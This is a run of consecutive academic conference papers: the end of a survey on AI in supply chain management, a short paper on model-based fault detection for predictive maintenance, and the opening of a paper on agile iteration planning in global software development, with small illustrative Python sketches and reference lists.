Genetic algorithms are a type of AI approach that has been applied successfully to a number of difficult supply chain network design issues; vehicle routing and scheduling are two of these problems [31, 32]. The vehicle routing problem (VRP) is the task of determining a set of low-cost vehicle routes that start from a local warehouse, visit a set of predetermined clients, and return to the distribution center without violating any constraints [33]. According to a show-floor discussion at MODEX 2018, robotics can offer a method to turn conventional equipment into self-driving vehicles. Logistics organizations rely on physical networks and, increasingly, on digitization, which must work in harmony while dealing with large volumes, low margins, lean asset allocation, and time constraints. AI allows logistics organizations to optimize network coordination to levels of success that are impossible to attain with human thinking alone. AI can assist supply chain operations in redefining current habits and processes, such as moving activities from reactive to proactive, scheduling from forecast to prediction, processes from manual to automated, and services from standardized to personalized [34]. Moreover, there is nowadays a significantly greater focus on customer experience, which entails developing richer, more personalized, and more convenient experiences for the customer. Making every user feel special and welcome is a difficult task in modern organizations; it used to be complex and expensive, and was often reserved only for the most profitable customers. AI technologies such as machine learning and computer vision have fundamentally transformed it. For example, if an ordinary grocery buyer puts a bundle of bananas in his cart, cameras or sensors may communicate the information to an AI application that already knows what the buyer loves based on previous purchases. The application may then recommend, through a video monitor in the cart, that bananas would be excellent with a salted caramel ice cream, which the shopper's purchasing history indicates he or she enjoys, and remind the customer of where to acquire the needed components [35]. A runner, for example, could download a free application from an athletic shoe brand that would monitor her workout pattern and offer footwear matched to her routine as well as jogging trails she would enjoy. Amazon has developed a retail facility in Seattle that lets customers pick up food from the shelves and walk out without waiting at the checkout to pay [36].

The Amazon Go store employs computer vision technology to track customers when they swipe in and to associate them with the goods taken from the shelves. The concept is simple: no checkout counters and no cashiers. The customer simply shows the Amazon Go app on his smartphone at the store's entrance, makes his purchases, and exits as soon as he is done. The cameras, which are dispersed throughout the area, monitor the client's movements and detect the products taken from the shelves. When a customer leaves the store, the bill is automatically sent to the application based on the items in his bag, and the payment is made through the Amazon account [36]. Amazon is now regularly collecting data from drones during home deliveries in order to better target future purchases. AI is providing the appropriate tools for operations management in every area [37].
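To make the vehicle routing formulation introduced at the start of this section concrete, the sketch below builds capacity-feasible delivery routes from a depot with a greedy nearest-neighbour heuristic. It is only a simple stand-in for the genetic-algorithm solvers cited in [31, 32], and the coordinates, demands and capacity are made-up example data:

```python
# Toy VRP sketch: greedy nearest-neighbour route construction under a vehicle
# capacity limit. Each route implicitly starts and ends at the depot.
import math

def nearest_neighbour_routes(depot, customers, demands, capacity):
    """customers: {name: (x, y)}, demands: {name: units}. Returns a list of routes."""
    assert all(d <= capacity for d in demands.values()), "demand exceeds vehicle capacity"
    dist = lambda a, b: math.hypot(a[0] - b[0], a[1] - b[1])
    unvisited = set(customers)
    routes = []
    while unvisited:
        route, load, position = [], 0, depot
        while True:
            feasible = [c for c in unvisited if load + demands[c] <= capacity]
            if not feasible:
                break
            nxt = min(feasible, key=lambda c: dist(position, customers[c]))
            route.append(nxt)
            load += demands[nxt]
            position = customers[nxt]
            unvisited.remove(nxt)
        routes.append(route)
    return routes

customers = {"A": (2, 1), "B": (5, 4), "C": (1, 6), "D": (6, 1)}
demands = {"A": 3, "B": 4, "C": 2, "D": 5}
print(nearest_neighbour_routes(depot=(0, 0), customers=customers,
                               demands=demands, capacity=8))
# Example output: [['A', 'D'], ['C', 'B']]
```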

4 Artificial Intelligence Risks and Challenges
In the third section, “Benefits of AI in Supply Chain Management”, we looked at the positive effects of AI on supply chain processes (demand forecasting, warehousing, …). But even though AI provides benefits to consumers and adds value, it may also have negative effects and sometimes severe repercussions. AI is not a self-contained solution: companies must control it and provide inputs to ensure smooth operation. Furthermore, it eventually evolves into a complex monitoring system, making it difficult to detect and recognize errors when they appear. Moreover, it is challenging to rely fully on AI. The entire process requires time, domain expertise, and security administrators, which is a significant problem for most businesses, especially because it manages sensitive business data. Companies must ensure that the system is secure, otherwise security incidents may adversely impact supply chain performance [40]. Another important risk area is the interface between humans and robots. Challenges in automated transport, industries, and networks are among the most evident: when an operator of large machinery, trucks, or other equipment does not notice that the system needs to be stopped or that something should be activated because his attention is elsewhere, accidents and failures are possible. With increased automation, companies reduce their workforce. Employees who currently hold these roles and rely on their logistics-based positions to improve their lives, support their families, and pay their bills are the main victims of this improved efficiency [41]. As AI takes over, fewer jobs will be available across the board; companies must somehow develop new roles for their workers or let them go entirely. In brief, AI consumes a lot of effort in terms of time and money, raises the unemployment problem, and limits innovation on the part of developers. Also, the new generation is becoming lazy, and the rate of technological dependency has increased.

5 Conclusion
This paper has presented the findings of research on artificial intelligence applications in the global supply chain and their benefits and challenges, based on different article reviews and case studies combined with
bibliometric analysis to investigate the current state of research on AI applications in the supply chain. Over the previous few decades, AI has played a significant role in the modern revolution. From demand forecasting and procurement to production, warehousing, and distribution, artificial intelligence techniques increase supply chain management effectiveness. This new technology has advanced due to the impact of recent developments in data processing and high-performance computing, and a plethora of industrial products have been created with intelligent capabilities and complex mechanisms. It is worth noting that the trend in global supply chain operations driven by AI is increasing immensely, implying that AI has already become a priority for several companies all over the world. However, when compared with traditional manufacturing organizations, the artificial intelligence transformation is both an opportunity and a challenge. In this intriguing field, our findings are just a starting point for future research, such as:
– Natural Language Processing (NLP) represents a promising domain that, when combined with other Industry 4.0 technologies such as IoT and blockchain, has the potential to greatly affect supply chain management practices.
– Automated planning and scheduling, which has important applications ranging from managing space vehicles to programming robots, deserves more attention in order to create future opportunities in the industrial sectors.
– Blockchain, big data, and robotics seem to be another key area to investigate, particularly given the crucial role robotics plays in many industrial fields. On the other hand, big data will become the new oil, with data provision companies functioning as utility suppliers (Kaplan and Haenlein, 2019); it has therefore become valuable to evaluate the aspects where big data could indeed add value to the supply chain.
– Because of the optimization techniques that can handle an integrated heuristic algorithm, we believe that TS needs extra scientific attention in future supply chain management analyses.
– The implications of machine learning and artificial intelligence for transportation might be addressed, particularly with the emergence of self-driving vehicles and AI-powered intelligent road systems.

References 1. Collin, J., et al.: How to design the right supply chains for your customers. Supply Chain Manag. 14, 411–417 (2016) 2. Mentzer, J.T., et al.: Defining supply chain management. J. Bus. Logist. (2001) 3. Ni, D., Xiao, Z., Lim, M.K.: A systematic review of the research trends of machine learning in supply chain management. Int. J. Mach. Learn. Cybern. 11, 1463–1482 (2019). Springer 4. Huang, B., Huan, Y., Xu, L., Zheng, L., Zou, Z.: Automated trading systems statistical and machine learning methods and hardware implementation: a survey. Enterp. Inf. Syst. 13(1), 132–144 (2019)

5. Huang, C., Cai, H., Xu, L., Xu, B., Gu, Y., Jiang, L.: Data-driven ontology generation and evolution towards intelligent service in manufacturing systems. Future Gener. Comput. Syst. 101, 197–207 (2019) 6. Rajkomar, E., et al.: Scalable and accurate deep learning with electronic health records. NPJ Digit. Med. 1(1), 1–10 (2018) 7. Xu, L., Tan, W., Zhen, H., Shen, W.: An approach to enterprise process dynamic modeling supporting enterprise process evolution. Inf. Syst. Front. 10(5), 611–624 (2008) 8. Shi, Z., et al.: MSMiner—a developing platform for OLAP. Decis. Support Syst. 42(4), 2016–2028 (2007) 9. Zhang, C., Xu, X., Chen, H.: Theoretical foundations and applications of cyberphysical systems. J. Libr. Hi Tech 38(1), 95–104 (2019) 10. Bostrom, N., Yudkowsky, E.: The ethics of artificial intelligence. Cambridge Handb. Artif. Intell. 1, 316–334 (2014) 11. Habimana, O., Li, Y., Li, R., Gu, X., Yu, G.: Sentiment analysis using deep learning approaches: an overview. Sci. China Inf. Sci. 63, 1–36 (2020). Springer 12. Lopes, V., Alexandre, L.A.: An overview of blockchain integration with robotics and artificial intelligence. arXiv preprint arXiv:1810.00329 (2018). arxiv.org 13. Nilsson, N.J.: Principles of Artificial Intelligence. Morgan Kaufmann Publishers Inc., Palo Alto (2014) 14. Erhan, D., Courville, A., Bengio, Y., Vincent, P.: Why does unsupervised pre-training help deep learning?. In: Proceedings of the Thirteenth International Conference on Artificial Intelligence and Statistics. In: JMLR Workshop and Conference Proceedings, pp. 201–208 (2010) 15. Hu, R.Q., Hanzo, L.: Twin-timescale artificial intelligence aided mobility-aware edge caching and computing in vehicular networks. IEEE Trans. Veh. Technol. 68(4), 3086–3099 (2019) 16. Chen, X.W., Lin, X.: Big data deep learning: challenges and perspectives. IEEE Access 2, 514–525 (2014) 17. Zhang, C.: Research on the economical influence of the difference of regional logistics developing level in China. J. Industr. Integr. Manag. 05(02), 205–223 (2020) 18. Bughin, J., Hzan, E., Ramaswamy, S., Chui, M., et al.: Artificial Intelligence: The Next Digital Frontier? McKinsey Global Institute, Washington, DC (2017) 19. Burgess, A.: AI in action. In: The Executive Guide to Artificial Intelligence. Palgrave Macmillan, Cham (2018) 20. Kusiak, A.: Smart manufacturing, Int. J. Prod. Res. 56, 508–517 (2018) 21. Martin, C., Leurent, H.: Technology and innovation for the future of production: accelerating value creation. WEF (2017) 22. Webster, C., Ivanov, S.H.: Robotics, artificial intelligence, and the evolving nature of work. In: George, B., Paul, J. (eds.) Business Transformation in Data Driven Societies. PalgraveMacMillan, London (2019, Forthcoming) 23. Prihatno, A.T., Nurcahyanto, H., Jang, Y.M.: Artificial intelligence platform based for smart factory. In: 1st Korea Artificial Intelligence Conference (2020) 24. Artificial intelligence in industry: intelligent production. https://new.siemens.com/global/en/ company/stories/industry/ai-in-industries.html 25. O’Reilly, C., Binns, A.J.M.: The three stages of disruptive innovation: idea generation, incubation, and scaling. Calif. Manag. Rev. 61, 49–71 (2019) 26. Ehiorobo, O.A.: Strategic agility and ai-enabled resource capabilities for business survival in post-covid-19 global economy. Int. J. Inf. Bus. Manag. 12, 201–213 (2020) 27. Klumpp, M.: Automation and artificial intelligence in business logistics systems: human reactions and collaboration requirements. Int. J. Logist. Res. Appl. 
21(3), 224–242 (2018)

28. Abdul-Rahman, et al.: [16] the author s an “Internet of things application using tethered msp430 to thinkspeak cloud” for the constant monitoring of the data and the information’s gathered in the real time 29. Silver, D., et al.: Mastering the game of Go with deep neural networks and tree search. Nature 529(7587), 484 (2016) 30. Dorigo, M., Birattari, M.: Ant Colony Optimization. Springer, Boston (2010). https://doi.org/ 10.1007/978-0-387-30164-8_22 31. Malmborg, C.: A genetic algorithm for service level based vehicle scheduling. Eur. J. Oper. Res. 93, 121–134 (1996) 32. Park, Y.B.: A hybrid genetic algorithm for the vehicle scheduling problem with due times and time deadlines. Int. J. Prod. Econ. 73(2), 175–188 (2001) 33. Christo des, N.: Vehicle routing. In: Lawler, E., Lenstra, J., Rin, A., Kannooy, S.D. (eds.) The Traveling Salesman Problem, pp. 431–448. Wiley, Hoboken (1964) 34. Gesing, B., Peterson, S.J., Michelsen, D.: Artificial Intelligence In Logistics. A collaborative report by DHL and IBM on implications and use cases for the logistics industry (2018). https://www.logistics.dhl/content/dam/dhl/global/core/documents/pdf/glo-artificialintelligence-in-logisticstrend-report.pdf. Accessed 14 Nov 2018 35. Mortimer, G., Milford, M.: When AI meets your shopping experience it knows what you buy – and what you ought to buy. The Conversation, 31 August 2018 36. Metz, R.: Amazon’s cashier-less Seattle grocery store is opening to the public. MIT Technical review (2018). Mnih, V., Kavukcuoglu, K., Silver, D., Rusu, A.A., et al.: Human level control through deep reinforcement learning. Nature 518(7540), 529–33 (2015) 37. Druehl, C., Carrillo, J., Hsuan, J.: Technological innovations: impacts on supply chains. In: Moreira, A., Ferreira, L., Zimmermann, R. (eds.) Innovation and Supply Chain Management. CMS, pp. 259–281. Springer, Cham (2018). https://doi.org/10.1007/978-3-319-74304-2_12 38. Walker. J.: Machine Learning in Manufacturing: Present and Future Use Cases (2018). https:// www.techemergence.com/machine-learning-in-manufacturing/. Accessed 13 Nov 2018 39. Kaplan, A., Haenlein, M.: Business Horizons. Elsevier, Amsterdam (2019) 40. Moore, P.V.: OSH and the future of work: benefits and risks of artificial intelligence tools in workplaces. In: International Conference on Human-Computer Interaction (2019) 41. Mar, W., Thaw, Y.: An analysis of benefits and risks of artificial intelligence. Int. J. Trend Sci. Res. Dev. 3, 2456–6470 (2019) 42. Russell, S., Dewey, D., Tegmark, M.: Research priorities for robust and beneficial artificial intelligence. AI Mag. (2015). ojs.aaai.org 43. Baryannis, G., Dani, S., Validi, S., Antoniou, G.: Decision support systems and artificial intelligence in supply chain risk management. In: Zsidisin, G.A., Henke, M. (eds.) Revisiting Supply Chain Risk. SSSCM, vol. 7, pp. 53–71. Springer, Cham (2019). https://doi.org/10. 1007/978-3-030-03813-7_4 44. Modgil, S., Singh, R.K., Hannibal, C.: Artificial intelligence for supply chain resilience: learning from COVID-19. Int. J. Logist. Manag. 33, 1246–1268 (2021). ISSN 0957-4093 (2021)

Fault Detection and Diagnosis in Condition-Based Predictive Maintenance Oumaima El Hairech(B) and Abdelouahid Lyhyaoui LTI Laboratory, ENSA of Tangier, Abdelmalek Essadi University, Tangier, Morocco [email protected], [email protected]

Abstract. The maintenance of tools, equipment and machines is, today more than ever, at the heart of process optimization that will support market developments while maintaining efficiency and an optimal productivity rate. An accurate and timely maintenance plan will reduce unplanned downtimes, improve machine availability, and reduce the risk of non-compliance. Predictive maintenance (PdM), supported by digital technologies, will allow companies to predict future breakdowns and take early action to prevent them, and this will have a major impact on increasing the availability rate of machines and creating a more secure link with production, while reducing unplanned costs. Fault detection and diagnosis (FDD) lies at the core of PdM with the primary focus on finding anomalies in the working equipment at early stages and alerting the manufacturing supervisor to carry out maintenance activity. The aim of this paper is to highlight fault detection as a component of predictive maintenance and describe the model-based approach of machine fault diagnosis. Keywords: Predictive maintenance · Machine learning (ML) · Fault detection · Fault diagnosis · Fault prognosis · Condition monitoring · ML approach · ML algorithm · Industry 4.0 · Root cause analysis (RCA)

1 Introduction
Recent years have seen an advanced approach to maintenance which is particularly attractive in the Industry 4.0 environment and significantly improves the efficiency of modern production facilities. Previously, maintenance could be divided into two categories. On the one hand, we have corrective maintenance, also called reactive maintenance [1], which only allows intervention after the failure or breakdown of a piece of equipment or a production line, and which can cause harmful financial losses for the company because of all the unplanned downtimes that result. On the other hand, we have preventive maintenance, in other words proactive maintenance, which allows intervention before the occurrence of a breakdown [2], and which can itself be divided into two categories: predetermined maintenance, which is mainly based on the history of the equipment or machine lifetime to set up an intervention schedule before failure, unlike condition-based maintenance, which is based on the permanent supervision of the machine to define a plan of maintenance activities.

Although condition-based maintenance is based on sensors, it can only describe the current state of the machine without being able to estimate potential changes in state [5]. Predictive maintenance is an enhancement of this condition-based strategy: it uses the data resulting from automated monitoring to make an intelligent prognosis that makes it possible to detect the warning signs of failure and to predict the time remaining before failure [6]. This maintenance policy involves several important improvements in the manufacturing and maintenance process that can significantly reduce production costs [7]. Anomaly detection is a very important component of predictive maintenance; it is mainly based on the detection of outliers using techniques that identify behavior deviating from normal operation. It is important that manufacturing processes, which generate a large volume of data, be monitored in real time to generate timely anomaly alerts [7]. The rest of this article is organized as follows: in the first section we briefly define the terminologies related to process monitoring, the concept of condition-based monitoring, as well as fault detection, diagnosis and fault prognosis. In the second section we describe the model-based approach to fault diagnosis. In the last section we provide a conclusion and future works.

2 Terminology and Concepts
Before talking about monitoring, it is important to clearly define the terminologies used in this area. In this section we first clarify the difference between fault, failure, and malfunction, since they are the basic and most used terms in condition monitoring. Then we pinpoint the link between the condition-based monitoring strategy and predictive maintenance.

2.1 Fault, Failure, and Malfunction
A fault can be defined as an unpermitted deviation of at least one characteristic property of the system from the acceptable, usual, standard condition [8, 9]. The fault may already exist in the process or may appear at any time, and the speed of appearance of faults may also vary [10]. There are many different types of faults: design faults, manufacturing faults, assembly faults, normal operation faults, maintenance faults, and operator faults. When these faults are directly caused by humans, they can also be called errors. Frequently, faults are difficult to detect, especially if they are small or hidden [7]. A fault or multiple faults may initiate a failure or a malfunction. A failure is defined as a permanent interruption of the system's execution of a demanded function, or a permanent interruption of a system's ability to perform a required function under specified operating conditions. By predictability, we can distinguish between different types of failures: random or unpredictable failures, which are statistically independent of operation time or other failures; deterministic failures, which are predictable for certain conditions; and systematic or casual failures, which depend on known conditions [8]. A malfunction is a temporary incapability of a system to fulfill its desired function. Usually, a failure or a malfunction occurs after the beginning of operation or after stressing the system [9].

2.2 Predictive Maintenance and Condition Monitoring
Predictive maintenance brings a new dimension to maintenance strategies, maximizing machine lifetimes and minimizing unplanned downtimes. It is mainly based on signs coming from the machine, such as unusual noises, vibrations, etc. [11]. Among these signs, there are those which are detectable by operators and others which cannot be observed by a human being because they evolve slowly and therefore cannot be identified on a day-to-day basis. It is for this reason that manufacturers set up monitoring systems using a variety of sensors and different techniques to collect machine data and parameters, store them, and then perform in-depth analysis [12]. It is in this logic that predictive maintenance is considered an upgrade of the condition-based strategy: it goes beyond automated machine condition monitoring and extends to the computerized evaluation of the input data, enabling intelligent prognostics that detect failure triggers and predict how long remains before a failure is likely to occur [13]. Most anomalies do not occur instantaneously but change progressively from normality to abnormality, so it is necessary to rely on the prediction of degradation using tools that allow permanent observation, detect deviations from the average performance of the machine, and thus ensure proper monitoring of degradation. This presupposes that there is current information about an item's condition, as well as historical data about normal and abnormal operating behavior [13].

2.3 Fault Detection, Diagnosis, and Prognosis
A good approach to predictive maintenance does not stop at predicting the time remaining before failure occurs, but also relies on the collected monitoring data to determine the root cause of the failure [14, 15]. Anomaly detection can therefore be considered a critical component of PdM. In general, it is defined as a process that makes it possible to determine or detect faults in a system [17]; in other words, it makes it possible to differentiate abnormal behavior from the normal behavior of a machine [16]. To have an accurate detection approach, it is necessary to monitor the machine components separately, which makes it easier to identify the root causes of a new fault [15]. Fault diagnosis is a process that includes the detection, isolation, identification, classification, and evaluation of faults [17]. It consists of locating the root causes of failures to reduce financial losses and improve process safety [16]. Prognosis, on the other hand, is the process of predicting future failures of a system by making an in-depth analysis of the history of the system's operating conditions as well as monitoring deviations of operation in comparison with the normal condition [17].

3 Machine Fault Diagnosis

In the literature, several approaches are cited for handling fault detection and diagnosis problems. These approaches can be categorized into two main classes, namely the model-based approach [18] and the data-driven approach [19]. The first is based on knowledge inferred from models developed from a fundamental understanding of the physics of a system, while the second is based on the transformation of a significant amount of historical data to build a diagnostic system.


The model-based method can itself be classified into two categories [20]: quantitative and qualitative models. Quantitative models link the inputs and outputs of a system with mathematical functional relationships, while qualitative models create this link using qualitative functions centered on different units of the system.

3.1 Model-Based Approach

Fault diagnosis usually includes fault detection, isolation, identification, classification, and evaluation steps, but sometimes the combination of fault detection and isolation (FDI) is treated as a single fault diagnosis step [9]. Model-based FDI relies on methods that extract features from measured signals and process information using mathematical models. A process model is used to detect the difference between the actual measurements and their estimates, which makes it possible to generate residual signals to which variable or fixed thresholds can be applied in order to detect faults. Several residuals can be designed, each sensitive to a particular fault occurring in a particular part of the system. When the threshold set for a residual is exceeded, an analysis is carried out to move on to fault isolation. Figure 1 shows a block diagram of a model-based FDI system; this diagram is widely accepted by the fault diagnosis community and can be found in much of the literature dealing with this subject [21].

Fig. 1. Logical block diagram of model-based fault diagnosis

The structure contains two main stages, residual generation and residual evaluation, which can be described as follows. Residual generation: in this block, the inputs and outputs of the system are used to generate residual signals. The objective is to detect the occurrence of a fault. The residual is zero or close to zero when no fault is present, and clearly different from zero otherwise; this means that under ideal conditions the residual is typically independent of the process inputs and outputs [21, 22].


Residual evaluation: in this second block, the residuals are examined to assess the likelihood that a fault has occurred, and decision rules are applied to decide whether a fault has actually been produced. Several methods are used for this evaluation; among others, there are geometric methods, which apply a threshold test to the instantaneous values or to moving averages of the residuals, and statistical methods such as generalized likelihood ratio tests [22]. Model-based techniques rely on an accurate dynamic model of the system and can detect even unforeseen faults [21].
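As a rough illustration of the two stages just described, the sketch below generates residuals as the difference between measured outputs and the predictions of a simple process model, and evaluates them with a fixed threshold on a moving average. It is a minimal, generic example and not the scheme of any specific reference; the first-order model, its coefficients, the window length, and the threshold value are all assumptions.

```python
import numpy as np

def predict_output(u, a=0.8, b=0.5):
    """Hypothetical first-order process model: y[k] = a*y[k-1] + b*u[k-1]."""
    y_hat = np.zeros_like(u)
    for k in range(1, len(u)):
        y_hat[k] = a * y_hat[k - 1] + b * u[k - 1]
    return y_hat

def detect_fault(u, y_measured, window=20, threshold=0.3):
    """Residual generation followed by a moving-average threshold test."""
    residual = y_measured - predict_output(u)          # residual generation
    kernel = np.ones(window) / window
    smoothed = np.convolve(np.abs(residual), kernel, mode="same")
    alarms = smoothed > threshold                      # residual evaluation
    return residual, alarms

# Hypothetical usage: a bias fault appears at sample 300.
rng = np.random.default_rng(1)
u = rng.normal(0, 1, 600)
y = predict_output(u) + rng.normal(0, 0.05, 600)
y[300:] += 0.5                                         # injected fault
_, alarms = detect_fault(u, y)
print("first alarm at sample", int(np.argmax(alarms)))
```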

4 Conclusion and Future Research

In this paper we presented the first part of a survey of predictive maintenance components. We began by defining the terminology and concepts related to predictive maintenance and condition monitoring. In this first section we defined the basic terms fault, failure, and malfunction and the differences between them, then highlighted the upgrade from the condition monitoring strategy to the concept of predictive maintenance, and finally clarified the concepts of fault detection, diagnosis, and prognosis. In the second section we introduced the most cited approaches to fault detection and diagnosis problems in the literature, mainly the model-based approach and the data-driven approach, and we detailed the first one through a logical block diagram that illustrates the two main stages of the process: residual generation and residual evaluation. In future work, we plan to describe the data-driven approach to fault diagnosis and the techniques used for fault prognosis, which attempt to predict a prospective failure of a machine or component.

References 1. Mobley, R.K.: An Introduction to Predictive Maintenance. Elsevier Science, Amsterdam (2002) 2. Schmidt, B., Wang, L.: Cloud-enhanced predictive maintenance. Int. J. Adv. Manuf. Technol. 99(1–4), 5–13 (2018). https://doi.org/10.1007/s00170-016-8988 3. Grall, L.D., Berenguer, C., Roussignol, M.: Continuous time predictive-maintenance scheduling for a deteriorating system. IEEE Trans. Reliab. 51(2), 141–150 (2002). arXiv:1011. 1669v3, https://doi.org/10.1109/TR.2002.1011518 4. Zhou, L.X., Lee, J.: Reliability-centered predictive maintenance scheduling for a continuously monitored system subject to degradation. Reliab. Eng. Syst. Saf. 92(4), 530–534 (2007). https://doi.org/10.1016/j.ress.2006.01.006 5. Krupitzer, C., et al.: A survey on predictive maintenance for industry 4.0 (2020). arXiv:2002. 08224, http://arxiv.org/abs/2002.08224 6. Gebraeel, N.Z., Lawley, M.A., Li, R., Ryan, J.K.: Residual-life distributions from component degradation signals: a Bayesian approach. IIE Trans. (Inst. Industr. Eng.) 37(6), 543–557 (2005). arXiv:1011.1669v3, https://doi.org/10.1080/07408170590929018 7. Kamat, P., Sugandhi, R.: Anomaly detection for predictive maintenance in industry 4.0 - a survey. In: E3S Web of Conferences 170, 0. EVF’2019 (2020) 8. Hwang, I., Kim, Y., Seah, C.E.: A survey of fault detection, isolation and reconfiguration methods. IEEE Trans. Control Syst. Technol. 18, 636–653 (2010)


9. Iserman, R.: Fault-Diagnosis Systems: An Introduction from Fault Detection to Fault Tolerance, 1st edn. Springer, London (2006). https://doi.org/10.1007/3-540-30368-5 10. Iserman, R.: Process fault detection based on modeling and estimation methods- a survey. Automatica 20, 387–404 (1984) 11. ISO 13379-1:2012, Condition monitoring and diagnosis of machines—data interpretation and diagnosis techniques—Part 1: General guidelines (2012) 12. Krenek, J., Kuca, K., Blazek, P., Krejcar, O., Jun, D.: Application of artificial neural networks in condition based predictive maintenance. In: Król, D., Madeyski, L., Nguyen, N.T. (eds.) Recent Developments in Intelligent Information and Database Systems. SCI, vol. 642, pp. 75– 86. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-31277-4_7 13. Anh, D.T., D˛abrowski, K., Skrzypek, K.: The predictive maintenance concept in the maintenance department of the “Industry 4.0” production enterprise. Found. Manag. 10 (2018). ISSN 2080-7279, https://doi.org/10.2478/fman-2018-0022 14. Yam, R.C., Tse, P.W., Li, L., Tu, P.: Intelligent predictive decision support system for condition-based maintenance. Int. J. Adv. Manuf. Technol. 17(5), 383–391 (2001). https:// doi.org/10.1007/s001700170173 15. De Faria, H., Costa, J.G.S., Olivas, J.L.M.: A review of monitoring methods for predictive maintenance of electric power transformers based on dissolved gas analysis. Renew. Sustain. Energy Rev. 46, 201–209 (2015). https://doi.org/10.1016/j.rser.2015.02.052 16. Park, Y.-J., Fan, S.-K., Hs, C.-Y.: A review on fault detection and process diagnostics in industrial processes. Processes 8, 1123 (2020). https://doi.org/10.3390/pr8091123 17. Amini, N., Zhu, Q.: Fault detection and diagnosis with a novel source-aware autoencoder and deep residual neural network (2021). Elsevier B.V 18. Venkatasubrsmanian, V.: Towards integrated process supervision: current status and future directions. In: Proceedings of the IFAC International Conference on Computer Software Structures, Sweden, pp. 1–13 (1944) 19. Luo, M., et al.: Model-based fault diagnosis/prognosis for wheeled mobile robots: a review. 0-7803-9252-3/05/$20.00 ©2005. IEEE (2005) 20. Venkatasubramanian, V., Rengaswamy, R., Yin, K., Kavuri, S.N.: A review of process fault detection and diagnosis part I: quantitative model-based methods. J. Comput. Chem. Eng. 27, 293–311 (2003) 21. Simani, S., et al.: Model-Based Fault Diagnosis in Dynamic Systems Using Identification Techniques. Springer, London (2003). https://doi.org/10.1007/978-1-4471-3829-7 22. Vachtsevanos, G., Lewis, F., Roemer, M., Hess, A., Wu, B.: Intelligent Fault Diagnosis and Prognosis for Engineering Systems. Wiley, Hoboken (2006). ISBN 978-0-471-72999-0

Agile Practices in Iteration Planning Process of Global Software Development

Hajar Lamsellak(B), Amal Khalil, Mohammed Ghaouth Belkasmi, and Mohammed Saber

SmartICT Lab, Université Mohammed Premier/Mohammed First University Oujda, ENSA Oujda, 60000 Oujda, Morocco
[email protected]

Abstract. The term global software development (GSD) refers to a method of developing software in which stakeholders from many locations and backgrounds participate in the software development life cycle. Software companies use GSD to profit from its many advantages, including cheaper development costs, faster cycle times, access to remote experts, and proximity to the local market. Iterative software development is the goal of the agile software development approach. Customers can add or remove requirements and adjust their priorities after each iteration; this allows them to be a part of the team throughout the project and affords them a lot of flexibility. Therefore, to preserve these benefits in the GSD context, the agile planning process should consider the many imposed distances, such as geographic, temporal, cultural, language, and organizational ones. This paper focuses on the Iteration Planning level in Agile Global Software Development projects by presenting, based on the existing literature, the best agile practices recommended for use in GSD Iteration Planning.

Keywords: Global software development · Agile planning · Iteration planning · Agile practices

1 Introduction

The project management literature offers a variety of project types that are based on a comparison of two primary variables: the number of companies participating in their implementation and the number of locations involved in their development [1]. When the majority of the team members work for the same company and in the same location, the project is classified as traditional. When team members from several places collaborate on a project, it is referred to as a distributed project. When people from various countries collaborate on a project, it is called an international project, and when team members are geographically dispersed and work for different organizations, it is called a virtual project [1]. The global project is a new category that combines virtual and international projects by including people from different organizations and working in various countries across the globe [1].


Members of a global project's team come from a variety of cultures, organizations, and time zones; they are physically distributed across countries and speak multiple native languages [1]. These five dimensions of a global project help determine the team's success, the quality of the project deliverables, and the project's complexity, while presenting project managers and team members with new difficulties [1]. Global projects enable the unification of highly expert team members working on the same project without requiring teams to relocate to other countries, thereby minimizing costs [3]. The prospect of a larger customer base, cost reduction, and productivity improvement are among the advantages of globalization that organizations benefit from. At the same time, advances in technology enable organizations to change their operating models as well as how and where they source customers, capital, resources, and human capital, and how they develop software, giving rise to the concept of Global Software Development (GSD) [5]. GSD is a trend that originated in the early years of this millennium. It is a way of producing software in which stakeholders from remote locations and possibly different backgrounds are involved in the software development lifecycle to develop commercially viable software for a company [2]. GSD has grown from a newly adopted practice to a widely recognized and accepted approach to software development [13]. A GSD team consists of distributed members working across geographic, temporal, cultural, political, and organizational boundaries while collaborating on a common software project to accomplish an interdependent task [12]. Software companies adopt global software development to benefit from decreased cost, reduced cycle time, access to remote experts, and proximity to the local market. However, the distances inherent to GSD can prevent these benefits from being achieved and severely affect the communication, coordination, and collaboration processes [17]. Consequently, GSD practitioners face multiple challenges during different phases of software development. The low frequency of communication between remote counterparts, delayed feedback, slow resolution of impediments, decreased visibility of project activities, unawareness regarding remote members, and knowledge management difficulties are some of the challenges that prevent GSD projects from attaining the intended goals and being completed before the deadline [17]. To solve GSD challenges and gain the competitive edge provided by agile methods, practitioners have started applying agile methods in GSD. Agile methods provide high flexibility, increased productivity, fast development, and decreased defect rates; they promise to handle requirements changes throughout the development lifecycle, promote extensive collaboration between customers and developers, ensure customer satisfaction, and enhance communication and collaboration [9, 17]. As a result of these benefits, agile approaches are thought to be able to alleviate some of the issues of GSD by enhancing communication, coordination, and collaboration. However, because these methodologies were designed for collocated development, they must be adjusted for use in GSD [9, 17]. Agile adoption is commonplace, and working in a distributed environment is not an impediment to using agile approaches, according to [11].


In agile planning, change is anticipated: an iteration's scope is the only thing that is fixed. After each cycle, the customer can add or delete requirements, as well as adjust their priority. This gives customers a lot of flexibility and lets them feel like part of the team throughout the process [10]. Pre-planning, Release Planning, and Iteration Planning are the three primary parts of the agile planning process. Each phase involves specific actions that must be completed in order to accomplish the planning. However, when it comes to Global Software Development projects, the agile planning approach must take into consideration the GSD distances: geographical, temporal, cultural, linguistic, and organizational. As a result, the majority of the actions that make up the various phases of collocated development should be adapted and supplemented by supporting practices to ensure the project's success. The first level of agile planning, the pre-planning phase, was addressed in our earlier study [6], which described its application inside an Agile Global Software Development project. This article focuses on the Iteration Planning level in Agile Global Software Development projects by presenting the best agile practices recommended for use in GSD Iteration Planning, based on the existing literature. The paper is organized as follows: the background and related work are discussed in Sect. 2; Sect. 3 summarizes and discusses the findings; finally, Sect. 4 brings the paper to a close.

2 Background and Related Work

2.1 Challenges of Global Software Development Projects

